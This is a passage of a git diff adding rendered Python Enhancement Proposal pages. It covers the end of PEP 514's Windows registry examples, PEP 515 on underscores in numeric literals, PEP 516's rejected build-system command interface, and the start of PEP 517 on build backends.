+    (winreg.HKEY_LOCAL_MACHINE, r'Software\Python', winreg.KEY_WOW64_32KEY),
+]:
+    with winreg.OpenKeyEx(hive, key, access=winreg.KEY_READ | flags) as root_key:
+        for company in enum_keys(root_key):
+            if company == 'PyLauncher':
+                continue
+
+            with winreg.OpenKey(root_key, company) as company_key:
+                for tag in enum_keys(company_key):
+                    if (company, tag) in seen:
+                        if company == 'PythonCore':
+                            # TODO: Backwards compatibility handling
+                            pass
+                        continue
+                    seen.add((company, tag))
+
+                    try:
+                        with winreg.OpenKey(company_key, tag + r'\InstallPath') as ip_key:
+                            exec_path = get_value(ip_key, 'ExecutablePath')
+                            exec_args = get_value(ip_key, 'ExecutableArguments')
+                            if company == 'PythonCore' and not exec_path:
+                                # TODO: Backwards compatibility handling
+                                pass
+                    except OSError:
+                        exec_path, exec_args = None, None
+
+                    if exec_path:
+                        print('{}\\{} - {} {}'.format(company, tag, exec_path, exec_args or ''))
+                    else:
+                        print('{}\\{} - (not executable)'.format(company, tag))
+
+
+

This example only scans PythonCore entries for the current user. Where data +is missing, the defaults as described earlier in the PEP are substituted. Note +that these defaults are only for use under PythonCore; other registrations +do not have any default values:

+
# Only lists per-user PythonCore registrations
+# Uses fallback values as described in PEP 514
+
+import os
+import winreg
+
+def enum_keys(key):
+    i = 0
+    while True:
+        try:
+            yield winreg.EnumKey(key, i)
+        except OSError:
+            break
+        i += 1
+
+def get_value(key, value_name):
+    try:
+        # Named values require QueryValueEx; QueryValue would instead read
+        # the default value of a *subkey* with this name. Passing None as
+        # value_name reads the key's own default value.
+        return winreg.QueryValueEx(key, value_name)[0]
+    except FileNotFoundError:
+        return None
+
+with winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Python\PythonCore") as company_key:
+    print('Company:', get_value(company_key, 'DisplayName') or 'Python Software Foundation')
+    print('Support:', get_value(company_key, 'SupportUrl') or 'http://www.python.org/')
+    print()
+
+    for tag in enum_keys(company_key):
+        with winreg.OpenKey(company_key, tag) as tag_key:
+            print('PythonCore\\' + tag)
+            print('Name:', get_value(tag_key, 'DisplayName') or ('Python ' + tag))
+            print('Support:', get_value(tag_key, 'SupportUrl') or 'http://www.python.org/')
+            print('Version:', get_value(tag_key, 'Version') or tag[:3])
+            print('SysVersion:', get_value(tag_key, 'SysVersion') or tag[:3])
+            # Architecture is unknown because we are in HKCU
+            # Tools may use alternate approaches to determine architecture when
+            # the registration does not specify it.
+            print('SysArchitecture:', get_value(tag_key, 'SysArchitecture') or '(unknown)')
+
+        try:
+            ip_key = winreg.OpenKey(company_key, tag + '\\InstallPath')
+        except FileNotFoundError:
+            pass
+        else:
+            with ip_key:
+                ip = get_value(ip_key, None)
+                exe = get_value(ip_key, 'ExecutablePath') or os.path.join(ip, 'python.exe')
+                exew = get_value(ip_key, 'WindowedExecutablePath') or os.path.join(ip, 'pythonw.exe')
+                print('InstallPath:', ip)
+                print('ExecutablePath:', exe)
+                print('WindowedExecutablePath:', exew)
+        print()
+
+
+

This example shows a subset of the registration that will be created by a +just-for-me install of 64-bit Python 3.6.0. Other keys may also be created:

+
HKEY_CURRENT_USER\Software\Python\PythonCore
+    (Default) = (value not set)
+    DisplayName = "Python Software Foundation"
+    SupportUrl = "http://www.python.org/"
+
+HKEY_CURRENT_USER\Software\Python\PythonCore\3.6
+    (Default) = (value not set)
+    DisplayName = "Python 3.6 (64-bit)"
+    SupportUrl = "http://www.python.org/"
+    Version = "3.6.0"
+    SysVersion = "3.6"
+    SysArchitecture = "64bit"
+
+HKEY_CURRENT_USER\Software\Python\PythonCore\3.6\Help\Main Python Documentation
+    (Default) = "C:\Users\Me\AppData\Local\Programs\Python\Python36\Doc\python360.chm"
+    DisplayName = "Python 3.6.0 Documentation"
+
+HKEY_CURRENT_USER\Software\Python\PythonCore\3.6\InstallPath
+    (Default) = "C:\Users\Me\AppData\Local\Programs\Python\Python36\"
+    ExecutablePath = "C:\Users\Me\AppData\Local\Programs\Python\Python36\python.exe"
+    WindowedExecutablePath = "C:\Users\Me\AppData\Local\Programs\Python\Python36\pythonw.exe"
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0514.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0515/index.html b/pep-0515/index.html
new file mode 100644
index 00000000000..63092ae7094
--- /dev/null
+++ b/pep-0515/index.html
@@ -0,0 +1,344 @@
PEP 515 – Underscores in Numeric Literals | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 515 – Underscores in Numeric Literals

+
+
Author:
+
Georg Brandl, Serhiy Storchaka
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
10-Feb-2016
+
Python-Version:
+
3.6
+
Post-History:
+
10-Feb-2016, 11-Feb-2016
+
+
+
+
Table of Contents +
+
+

Abstract and Rationale

+

This PEP proposes to extend Python’s syntax and number-from-string +constructors so that underscores can be used as visual separators for +digit grouping purposes in integral, floating-point and complex number +literals.

+

This is a common feature of other modern languages, and can aid +readability of long literals, or literals whose value should clearly +separate into parts, such as bytes or words in hexadecimal notation.

+

Examples:

+
# grouping decimal numbers by thousands
+amount = 10_000_000.0
+
+# grouping hexadecimal addresses by words
+addr = 0xCAFE_F00D
+
+# grouping bits into nibbles in a binary literal
+flags = 0b_0011_1111_0100_1110
+
+# same, for string conversions
+flags = int('0b_1111_0000', 2)
+
+
+
+
+

Specification

+

The current proposal is to allow one underscore between digits, and +after base specifiers in numeric literals. The underscores have no +semantic meaning, and literals are parsed as if the underscores were +absent.
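Concretely, under this rule (illustrative examples; the commented-out forms raise SyntaxError):

# Allowed: a single underscore between digits, or after a base specifier.
1_000_000
0x_FF
0b1010_0101
1_000.000_1
1e1_0

# Not allowed (SyntaxError): leading, trailing, doubled, or
# separator-adjacent underscores.
# 1__000    1_000_    1._4    1.4e_1    0_x1F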

+
+

Literal Grammar

+

The production list for integer literals would therefore look like +this:

+
integer: decinteger | bininteger | octinteger | hexinteger
+decinteger: nonzerodigit (["_"] digit)* | "0" (["_"] "0")*
+bininteger: "0" ("b" | "B") (["_"] bindigit)+
+octinteger: "0" ("o" | "O") (["_"] octdigit)+
+hexinteger: "0" ("x" | "X") (["_"] hexdigit)+
+nonzerodigit: "1"..."9"
+digit: "0"..."9"
+bindigit: "0" | "1"
+octdigit: "0"..."7"
+hexdigit: digit | "a"..."f" | "A"..."F"
+
+
+

For floating-point and complex literals:

+
floatnumber: pointfloat | exponentfloat
+pointfloat: [digitpart] fraction | digitpart "."
+exponentfloat: (digitpart | pointfloat) exponent
+digitpart: digit (["_"] digit)*
+fraction: "." digitpart
+exponent: ("e" | "E") ["+" | "-"] digitpart
+imagnumber: (floatnumber | digitpart) ("j" | "J")
+
+
+
+
+

Constructors

+

Following the same rules for placement, underscores will be allowed in +the following constructors:

+
    +
  • int() (with any base)
  • +
  • float()
  • +
  • complex()
  • +
  • Decimal()
  • +
+
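For illustration, each of these accepts underscores under the same placement rule (behaviour as specified above, available from Python 3.6):

from decimal import Decimal

int("1_000_000")         # 1000000
int("FF_FF", 16)         # 65535
float("1_000.25")        # 1000.25
complex("1_000+2_000j")  # (1000+2000j)
Decimal("1_000.000_1")   # Decimal('1000.0001')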
+
+

Further changes

+

The new-style number-to-string formatting language will be extended to +allow _ as a thousands separator, where currently only , is +supported. This can be used to easily generate code with more +readable literals. [11]

+

The syntax would be the same as for the comma, e.g. {:10_} for a +width of 10 with _ separator.

+

For the b, x and o format specifiers, _ will be +allowed and group by 4 digits.
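For example (a sketch of the extended format specifications described above):

"{:_}".format(1000000)       # '1_000_000'
"{:10_}".format(1000000)     # ' 1_000_000' (width 10, right-aligned)
"{:_x}".format(0xFFFFFFFF)   # 'ffff_ffff'  (groups of 4 digits)
"{:_b}".format(0b101101111)  # '1_0110_1111'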

+
+
+
+

Prior Art

+

Those languages that do allow underscore grouping implement a large +variety of rules for allowed placement of underscores. In cases where +the language spec contradicts the actual behavior, the actual behavior +is listed. (“single” or “multiple” refer to allowing runs of +consecutive underscores.)

+
    +
  • Ada: single, only between digits [8]
  • +
  • C# (open proposal for 7.0): multiple, only between digits [6]
  • +
  • C++14: single, between digits (different separator chosen) [1]
  • +
  • D: multiple, anywhere, including trailing [2]
  • +
  • Java: multiple, only between digits [7]
  • +
  • Julia: single, only between digits (but not in float exponent parts) +[9]
  • +
  • Perl 5: multiple, basically anywhere, although docs say it’s +restricted to one underscore between digits [3]
  • +
  • Ruby: single, only between digits (although docs say “anywhere”) +[10]
  • +
  • Rust: multiple, anywhere, except for between exponent “e” and digits +[4]
  • +
  • Swift: multiple, between digits and trailing (although textual +description says only “between digits”) [5]
  • +
+
+
+

Alternative Syntax

+
+

Underscore Placement Rules

+

Instead of the relatively strict rule specified above, the use of +underscores could be less limited. As seen in other languages, common +rules include:

+
    +
  • Only one consecutive underscore allowed, and only between digits.
  • +
  • Multiple consecutive underscores allowed, but only between digits.
  • +
  • Multiple consecutive underscores allowed, in most positions except +for the start of the literal, or special positions like after a +decimal point.
  • +
+

The syntax in this PEP has ultimately been selected because it covers +the common use cases, and does not allow for syntax that would have to +be discouraged in style guides anyway.

+

A less common rule would be to allow underscores only every N digits +(where N could be 3 for decimal literals, or 4 for hexadecimal ones). +This is unnecessarily restrictive, especially considering the +separator placement is different in different cultures.

+
+
+

Different Separators

+

A proposed alternate syntax was to use whitespace for grouping. +Although strings are a precedent for combining adjoining literals, the +behavior can lead to unexpected effects which are not possible with +underscores. Also, no other language is known to use this rule, +except for languages that generally disregard any whitespace.

+

C++14 introduces apostrophes for grouping (because underscores +introduce ambiguity with user-defined literals), which is not +considered because of the use in Python’s string literals. [1]

+
+
+
+

Implementation

+

A preliminary patch that implements the specification given above has +been posted to the issue tracker. [12]

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0515.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0516/index.html b/pep-0516/index.html
new file mode 100644
index 00000000000..af77ffb6f0f
--- /dev/null
+++ b/pep-0516/index.html
@@ -0,0 +1,584 @@
PEP 516 – Build system abstraction for pip/conda etc | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 516 – Build system abstraction for pip/conda etc

+
+
Author:
+
Robert Collins <rbtcollins at hp.com>, +Nathaniel J. Smith <njs at pobox.com>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
26-Oct-2015
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP specifies a programmatic interface for pip [1] and other +distribution or installation tools to use when working with Python +source trees (both the developer tree - e.g. the git tree - and source +distributions).

+

The programmatic interface allows decoupling of pip from its current hard dependency on setuptools [2], which is desirable for two key reasons:

+
    +
  1. It enables new build systems that may be much easier to use without +requiring them to even appear to be setuptools.
  2. +
  3. It facilitates setuptools itself changing its user interface without +breaking pip, giving looser coupling.
  4. +
+

The interface needed to permit pip to install build systems also enables pip to install build-time requirements for packages, which is an important step in getting pip to full feature parity with the installation components of easy_install.

+

As PEP 426 is draft, we cannot utilise the metadata format it +defined. However PEP 427 wheels are in wide use and fairly well specified, so +we have adopted the METADATA format from that for specifying distribution +dependencies and general project metadata. PEP 508 provides a +self-contained language for describing a dependency, which we encapsulate in a +thin JSON schema to describe bootstrap dependencies.

+

Since Python sdists specified in PEP 314 are also source trees, this +PEP is updating the definition of sdists.

+
+
+

PEP Rejection

+

The CLI based approach proposed in this PEP has been rejected in favour of the +Python API based approach proposed in PEP 517. The specific CLI used to +communicate with build backends running as isolated subprocesses will be +considered an implementation detail of front-end developer tool implementations.

+
+
+

Motivation

+

There is significant pent-up frustration in the Python packaging ecosystem +around the current lock-in between build system and pip. Breaking that lock-in +is better for pip, for setuptools, and for other build systems like flit +[3].

+
+
+

Specification

+
+

Overview

+

Build tools will be located by reading a file pypa.json from the root +directory of the source tree. That file describes how to get the build tool +and the name of the command to run to invoke the tool.

+

All tools will be expected to conform to a single command line interface +modelled on pip’s existing use of the setuptools setup.py interface.

+
+
+

pypa.json

+

The file pypa.json acts as a neutral configuration file for pip and other +tools that want to build source trees to consult for configuration. The +absence of a pypa.json file in a Python source tree implies a setuptools +or setuptools compatible build system.

+

The JSON has the following schema. Extra keys are ignored, which permits the use of pypa.json as a configuration file for other related tools. If doing so, the chosen keys must be namespaced under tools:

+
{"tools": {"flit": ["Flits content here"]}}
+
+
+
+
schema
The version of the schema. This PEP defines version “1”. Defaults to “1” +when absent. All tools reading the file must error on an unrecognised +schema version.
+
bootstrap_requires
Optional list of PEP 508 dependency specifications that must be +installed before running the build tool. For instance, if using flit, then +the requirements might be:
bootstrap_requires: ["flit"]
+
+
+
+
build_command
A mandatory key, this is a list of Python format strings [8] +describing the command to run. For instance, if using flit then the build +command might be:
build_command: ["flit"]
+
+
+

If using a command which is a runnable module fred:

+
build_command: ["{PYTHON}", "-m", "fred"]
+
+
+
+
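Putting these keys together, a complete pypa.json for a flit-based project might look like the following (illustrative):

{
    "schema": "1",
    "bootstrap_requires": ["flit"],
    "build_command": ["flit"]
}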
+
+
+

Process interface

+

The command to run is defined by a simple Python format string [8].

+

This permits build systems with dedicated scripts and those that are invoked +using “python -m somemodule”.

+

Processes will be run with the current working directory set to the root of +the source tree.

+

When run, processes should not read from stdin - while pip currently runs +build systems with stdin connected to its own stdin, stdout and stderr are +redirected and no communication with the user is possible.

+

As usual with processes, a non-zero exit status indicates an error.
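For illustration, here is a sketch of how a front end might expand the format strings and launch the process; the helper name is hypothetical, and only the {PYTHON} variable described below is substituted:

import subprocess
import sys

def run_build_command(build_command, args, source_tree):
    # Each element of build_command is a Python format string; only the
    # {PYTHON} variable (described below) is defined for substitution.
    argv = [part.format(PYTHON=sys.executable) for part in build_command]
    # Run from the root of the source tree, with stdin unavailable.
    subprocess.check_call(argv + args, cwd=source_tree,
                          stdin=subprocess.DEVNULL)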

+
+
+

Available format variables

+
+
PYTHON
The Python interpreter in use. This is important to enable calling things +which are just Python entry points.
+
{PYTHON} -m foo
+
+
+
+
+

Available environment variables

+

These variables are set by the caller of the build system and will always be +available.

+
+
PATH
The standard system path.
+
PYTHON
As for format variables.
+
PYTHONPATH
Used to control sys.path per the normal Python mechanisms.
+
+
+
+

Subcommands

+

There are a number of separate subcommands that build systems must support. The examples below use a build_command of flit for illustrative purposes; a consolidated front-end sketch follows the list of subcommands.

+
+
build_requires
Query build requirements. Build requirements are returned as a UTF-8 +encoded JSON document with one key build_requires consisting of a list +of PEP 508 dependency specifications. Additional keys must be +ignored. The build_requires command is the only command run without +setting up a build environment.

Example command:

+
flit build_requires
+
+
+
+
metadata
Query project metadata. The metadata and only the metadata should +be output on stdout in UTF-8 encoding. pip would run metadata just once to +determine what other packages need to be downloaded and installed. The +metadata is output as a wheel METADATA file per PEP 427.

Note that the metadata generated by the metadata command, and the metadata +present in a generated wheel must be identical.

+

Example command:

+
flit metadata
+
+
+
+
wheel -d OUTPUT_DIR
Command to run to build a wheel of the project. OUTPUT_DIR will point to +an existing directory where the wheel should be output. Stdout and stderr +have no semantic meaning. Only one file should be output - if more are +output then pip would pick an arbitrary one to consume.

Example command:

+
flit wheel -d /tmp/pip-build_1234
+
+
+
+
develop [--prefix PREFIX]
Command to do an in-place ‘development’ installation of the project. +Stdout and stderr have no semantic meaning.

Not all build systems will be able to perform develop installs. If a build system cannot do develop installs, then it should error when run. Note that doing so will cause operations like pip install -e foo to fail.

+

The --prefix option is used for defining an alternative prefix for the installation. While setuptools has --root and --user options, the same effects can be achieved using --prefix; pip or other tools that accept --root or --user options should translate appropriately.

+

The --root option is used to define an alternative root within which the command should operate.

+

For instance:

+
flit develop --root /tmp/ --prefix /usr/local
+
+
+

This should install scripts within /tmp/usr/local/bin, even if the Python environment in use reports that sys.prefix is /usr/, which would otherwise lead to using /tmp/usr/bin/. Similar logic applies for package files etc.

+
+
+
+
+
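Here is the consolidated front-end sketch promised above. It assumes the build environment has already been prepared and simply shells out to the subcommands; the function names are hypothetical:

import json
import subprocess
import sys

def _output(build_command, args, source_tree):
    argv = [part.format(PYTHON=sys.executable) for part in build_command]
    return subprocess.check_output(argv + args, cwd=source_tree)

def query_build_requires(build_command, source_tree):
    # The only subcommand run without a build environment; stdout is a
    # UTF-8 encoded JSON document whose extra keys must be ignored.
    doc = json.loads(_output(build_command, ["build_requires"],
                             source_tree).decode("utf-8"))
    return doc["build_requires"]

def query_metadata(build_command, source_tree):
    # stdout carries a wheel METADATA file in UTF-8.
    return _output(build_command, ["metadata"], source_tree).decode("utf-8")

def build_wheel(build_command, source_tree, output_dir):
    # The backend writes exactly one .whl file into output_dir.
    _output(build_command, ["wheel", "-d", output_dir], source_tree)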

The build environment

+

Except for the build_requires command, all commands are run within a build +environment. No specific implementation is required, but a build environment +must achieve the following requirements.

+
1. All dependencies specified by the project’s build_requires must be
   available for import from within $PYTHON.
2. All command-line scripts provided by the build-required packages must be
   present in $PATH.

A corollary of this is that build systems cannot assume access to any Python +package that is not declared as a build_requires or in the Python standard +library.
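A minimal sketch of one way to satisfy these requirements, using the stdlib venv module; the PEP deliberately does not mandate any particular implementation, and the helper name is an assumption:

import os
import subprocess
import venv

def make_build_env(env_dir, build_requires):
    venv.EnvBuilder(with_pip=True).create(env_dir)
    bin_dir = os.path.join(env_dir, "bin")  # "Scripts" on Windows
    python = os.path.join(bin_dir, "python")
    if build_requires:
        # Satisfies requirement 1: everything importable from $PYTHON.
        subprocess.check_call([python, "-m", "pip", "install"]
                              + list(build_requires))
    env = dict(os.environ)
    env["PYTHON"] = python
    # Satisfies requirement 2: build-required scripts are on $PATH.
    env["PATH"] = bin_dir + os.pathsep + env["PATH"]
    return env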

+
+
+

Hermetic builds

+

This specification does not prescribe whether builds should be hermetic or not. Existing build tools like setuptools will use installed versions of build-time requirements (e.g. setuptools_scm) and only install other versions on version conflicts or missing dependencies. However, it is likely that better consistency can be achieved by always isolating builds and using only the specified dependencies.

+

However, there are nuanced problems there - such as how users can force the avoidance of a bad version of a build requirement which meets some package's dependencies. Future PEPs may tackle this problem, but it is not currently in scope - it does not affect the metadata required to coordinate between build systems and things that need to do builds, and thus is not PEP material.

+
+
+

Upgrades

+

‘pypa.json’ is versioned to permit future changes without requiring +compatibility.

+

The sequence for upgrading either of the schemas in a new PEP will be:

+
1. Issue a new PEP defining an updated schema. If the schema is not entirely
   backward compatible then a new version number must be defined.
2. Consumers (e.g. pip) implement support for the new schema version.
3. Package authors opt into the new schema when they are happy to introduce a
   dependency on the version of ‘pip’ (and potentially other consumers) that
   introduced support for the new schema version.
+

The same process will take place for the initial deployment of this PEP: the propagation of the capability to use this PEP without a setuptools shim will be largely gated by the adoption rate of the first version of pip that supports it.

+
+
+

Static metadata in sdists

+

This PEP does not tackle the current inability to trust static metadata in +sdists. That is a separate problem to identifying and consuming the build +system that is in use in a source tree, whether it came from an sdist or not.

+
+
+

Handling of compiler options

+

Handling of different compiler options is out of scope for this specification.

+

pip currently handles compiler options by appending user supplied strings to +the command line it runs when running setuptools. This approach is sufficient +to work with the build system interface defined in this PEP, with the +exception that globally specified options will stop working globally as +different build systems evolve. That problem can be solved in pip (or conda or +other installers) without affecting interoperability.

+

In the long term, wheels should be able to express the difference between +wheels built with one compiler or options vs another, and that is PEP +material.

+
+
+
+

Examples

+

An example ‘pypa.json’ for using flit:

+
{"bootstrap_requires": ["flit"],
+ "build_command": "flit"}
+
+
+

When ‘pip’ reads this it would prepare an environment with flit in it before +trying to use flit.

+

Because flit doesn’t have setup-requires support today, +flit build_requires would just output a constant string:

+
{"build_requires": []}
+
+
+

flit metadata would interrogate flit.ini and marshal the metadata into +a wheel METADATA file and output that on stdout.

+

flit wheel would need to accept a -d parameter that tells it where to +output the wheel (pip needs this).

+
+
+

Backwards Compatibility

+

Older pips will remain unable to handle alternative build systems. +This is no worse than the status quo - and individual build system +projects can decide whether to include a shim setup.py or not.

+

All existing build systems that can produce wheels and do develop installs should be able to run under this abstraction, and will only need a specific adapter for them constructed and published on PyPI.

+

In the absence of a pypa.json file, tools like pip should assume a +setuptools build system and use setuptools commands directly.

+
+

Network effects

+

Projects that adopt build systems that are not setuptools compatible - that is, they have no setup.py, or the setup.py doesn't accept commands that existing tools try to use - will not be installable by those existing tools.

+

Where those projects are used by other projects, this effect will cascade.

+

In particular, because pip does not handle setup-requires today, any project +(A) that adopts a setuptools-incompatible build system and is consumed as a +setup-requirement by a second project (B) which has not itself transitioned to +having a pypa.json will make B uninstallable by any version of pip. This is +because setup.py in B will trigger easy-install when ‘setup.py egg_info’ is +run by pip, and that will try and fail to install A.

+

As such we recommend that tools which are currently used as setup-requires +either ensure that they keep a setuptools shim or find their consumers and +get them all to upgrade to the use of a pypa.json in advance of moving +themselves. Pragmatically that is impossible, so the advice is to keep a +setuptools shim indefinitely - both for projects like pbr, setuptools_scm and +also projects like numpy.

+
+
+

setuptools shim

+

It would be possible to write a generic setuptools shim that looks like +setup.py and under the hood uses pypa.json to drive the builds. This +is not needed for pip to use the system, but would allow package authors to +use the new features while still retaining compatibility with older pip +versions.
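A heavily simplified sketch of what such a shim's setup.py might look like; only the bdist_wheel case is shown, and a real shim would need to cover the other setup.py commands that pip invokes (e.g. egg_info):

# setup.py
import json
import subprocess
import sys

with open("pypa.json", encoding="utf-8") as f:
    build_command = json.load(f)["build_command"]
argv = [part.format(PYTHON=sys.executable) for part in build_command]

if len(sys.argv) > 1 and sys.argv[1] == "bdist_wheel":
    # "setup.py bdist_wheel -d DIR" maps onto the "wheel -d DIR" subcommand.
    sys.exit(subprocess.call(argv + ["wheel"] + sys.argv[2:]))
sys.exit("command %r is not supported by this shim" % sys.argv[1:2])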

+
+
+
+

Rationale

+

This PEP started with a long mailing list thread on distutils-sig [6]. Subsequent to that, an online meeting was held to debug all the positions folks had. Minutes from that were posted to the list [7].

+

This specification is a translation of the consensus reached there into PEP +form, along with some arbitrary choices on the minor remaining questions.

+

The basic heuristic for the design has been to focus on introducing an abstraction without requiring development not strictly tied to the abstraction. Where the gap to an improvement is small, or the cost of using the existing interface is very high, we have taken on the improvement as a dependency, but otherwise deferred it to future iterations.

+

We chose wheel METADATA files rather than defining a new specification, because pip can already handle wheel .dist-info directories which encode all the necessary data in a METADATA file. PEP 426 can't be used as it's still a draft, and defining a new metadata format, while worth doing, is a separate problem. Using a directory on disk would not add any value to the interface (pip has to do that today due to limitations in the setuptools CLI).

+

The use of ‘develop’ as a command is because there is no PEP specifying the +interoperability of things that do what ‘setuptools develop’ does - so we’ll +need to define that before pip can take on the responsibility for doing the +‘develop’ step. Once that’s done we can issue a successor PEP to this one.

+

The use of a command line API rather than a Python API is a little +contentious. Fundamentally anything can be made to work, and the pip +maintainers have spoken strongly in favour of retaining a process based +interface - something that is mature and robust in pip today.

+

The choice of JSON as a file format is a compromise between several constraints. Firstly, there is no stdlib YAML interpreter, nor one for any of the other low-friction structured file formats. Secondly, the INI format is a poor fit for a number of reasons, primarily that it has very minimal structure, and pip's maintainers are not fond of it. JSON is in the stdlib and has sufficient structure to permit embedding anything we want in future without requiring embedded DSLs.

+

Donald suggested using setup.cfg and the existing setuptools command line +rather than inventing something new. While that would permit interoperability +with less visible changes, it requires nearly as much engineering on the pip +side - looking for the new key in setup.cfg, implementing the non-installed +environments to run the build in. And the desire from other build system +authors not to confuse their users by delivering something that looks like but +behaves quite differently to setuptools seems like a bigger issue than pip +learning how to invoke a custom build tool.

+

The metadata and wheel commands are required to have consistent metadata to +avoid a race condition that could otherwise happen where pip reads the +metadata, acts on it, and then the resulting wheel has incompatible +requirements. That race is exploited today by packages using PEP 426 +environment markers, to work with older pip versions that do not support +environment markers. That exploit is not needed with this PEP, because either +the setuptools shim is in use (with older pip versions), or an environment +marker ready pip is in use. The setuptools shim can take care of exploiting +the difference older pip versions require.

+

We discussed having an sdist verb. The main driver for this was to make sure +that build systems were able to produce sdists that pip can build - but this is +circular: the whole point of this PEP is to let pip consume such sdists or VCS +source trees reliably and without requiring an implementation of setuptools. +Being able to create new sdists from existing source trees isn’t a thing pip +does today, and while there is a PR to do that as part of building from +source, it is contentious and lacks consensus. Rather than impose a +requirement on all build systems, we are treating it as a YAGNI, and will add +such a verb in a future version of the interface if required. The existing +PEP 314 requirements for sdists still apply, and distutils or setuptools +users can use setup.py sdist to create an sdist. Other tools should create +sdists compatible with PEP 314. Note that pip itself does not require +PEP 314 compatibility - it does not use any of the metadata from sdists - they +are treated like source trees from disk or version control.

+
+
+

References


Source: https://github.com/python/peps/blob/main/peps/pep-0516.rst

+

Last modified: 2023-10-11 12:05:51 GMT

\ No newline at end of file
diff --git a/pep-0517/index.html b/pep-0517/index.html
new file mode 100644
index 00000000000..e33cc78ec80
--- /dev/null
+++ b/pep-0517/index.html
PEP 517 – A build-system independent format for source trees | peps.python.org

PEP 517 – A build-system independent format for source trees

+
+
Author:
+
Nathaniel J. Smith <njs at pobox.com>, +Thomas Kluyver <thomas at kluyver.me.uk>
+
BDFL-Delegate:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
30-Sep-2015
+
Post-History:
+
01-Oct-2015, 25-Oct-2015, 19-May-2017, 11-Sep-2017
+
Resolution:
+
Distutils-SIG message
+
+
+
+
+
+

Abstract

+

While distutils / setuptools have taken us a long way, they +suffer from three serious problems: (a) they’re missing important +features like usable build-time dependency declaration, +autoconfiguration, and even basic ergonomic niceties like DRY-compliant +version number management, and (b) extending them is difficult, so +while there do exist various solutions to the above problems, they’re +often quirky, fragile, and expensive to maintain, and yet (c) it’s +very difficult to use anything else, because distutils/setuptools +provide the standard interface for installing packages expected by +both users and installation tools like pip.

+

Previous efforts (e.g. distutils2 or setuptools itself) have attempted +to solve problems (a) and/or (b). This proposal aims to solve (c).

+

The goal of this PEP is to get distutils-sig out of the business of being a gatekeeper for Python build systems. If you want to use distutils, great; if you want to use something else, then that should be easy to do using standardized methods. The difficulty of interfacing with distutils means that there aren’t many such systems right now, but to give a sense of what we’re thinking about see flit or bento. Fortunately, wheels have now solved many of the hard problems here – e.g. it’s no longer necessary that a build system also know about every possible installation configuration – so pretty much all we really need from a build system is that it have some way to spit out standard-compliant wheels and sdists.

+

We therefore propose a new, relatively minimal interface for +installation tools like pip to interact with package source trees +and source distributions.

+
+
+

Terminology and goals

+

A source tree is something like a VCS checkout. We need a standard +interface for installing from this format, to support usages like +pip install some-directory/.

+

A source distribution is a static snapshot representing a particular +release of some source code, like lxml-3.4.4.tar.gz. Source +distributions serve many purposes: they form an archival record of +releases, they provide a stupid-simple de facto standard for tools +that want to ingest and process large corpora of code, possibly +written in many languages (e.g. code search), they act as the input to +downstream packaging systems like Debian/Fedora/Conda/…, and so +forth. In the Python ecosystem they additionally have a particularly +important role to play, because packaging tools like pip are able +to use source distributions to fulfill binary dependencies, e.g. if +there is a distribution foo.whl which declares a dependency on +bar, then we need to support the case where pip install bar or +pip install foo automatically locates the sdist for bar, +downloads it, builds it, and installs the resulting package.

+

Source distributions are also known as sdists for short.

+

A build frontend is a tool that users might run that takes arbitrary +source trees or source distributions and builds wheels from them. The +actual building is done by each source tree’s build backend. In a +command like pip wheel some-directory/, pip is acting as a build +frontend.

+

An integration frontend is a tool that users might run that takes a +set of package requirements (e.g. a requirements.txt file) and +attempts to update a working environment to satisfy those +requirements. This may require locating, building, and installing a +combination of wheels and sdists. In a command like pip install +lxml==2.4.0, pip is acting as an integration frontend.

+
+
+

Source trees

+

There is an existing, legacy source tree format involving +setup.py. We don’t try to specify it further; its de facto +specification is encoded in the source code and documentation of +distutils, setuptools, pip, and other tools. We’ll refer +to it as the setup.py-style.

+

Here we define a new style of source tree based around the +pyproject.toml file defined in PEP 518, extending the +[build-system] table in that file with one additional key, +build-backend. Here’s an example of how it would look:

+
[build-system]
+# Defined by PEP 518:
+requires = ["flit"]
+# Defined by this PEP:
+build-backend = "flit.api:main"
+
+
+

build-backend is a string naming a Python object that will be +used to perform the build (see below for details). This is formatted +following the same module:object syntax as a setuptools entry +point. For instance, if the string is "flit.api:main" as in the +example above, this object would be looked up by executing the +equivalent of:

+
import flit.api
+backend = flit.api.main
+
+
+

It’s also legal to leave out the :object part, e.g.

+
build-backend = "flit.api"
+
+
+

which acts like:

+
import flit.api
+backend = flit.api
+
+
+

Formally, the string should satisfy this grammar:

+
identifier = (letter | '_') (letter | '_' | digit)*
+module_path = identifier ('.' identifier)*
+object_path = identifier ('.' identifier)*
+entry_point = module_path (':' object_path)?
+
+
+

And we import module_path and then lookup +module_path.object_path (or just module_path if +object_path is missing).
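A sketch of this resolution logic (the function name is an assumption):

import importlib

def resolve_backend(spec):
    # "flit.api:main" -> import flit.api, then look up the "main" attribute;
    # "flit.api"      -> the module itself is the backend object.
    module_path, _, object_path = spec.partition(":")
    backend = importlib.import_module(module_path)
    for attr in filter(None, object_path.split(".")):
        backend = getattr(backend, attr)
    return backend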

+

When importing the module path, we do not look in the directory containing the +source tree, unless that would be on sys.path anyway (e.g. because it is +specified in PYTHONPATH). Although Python automatically adds the working +directory to sys.path in some situations, code to resolve the backend should +not be affected by this.

+

If the pyproject.toml file is absent, or the build-backend +key is missing, the source tree is not using this specification, and +tools should revert to the legacy behaviour of running setup.py (either +directly, or by implicitly invoking the setuptools.build_meta:__legacy__ +backend).

+

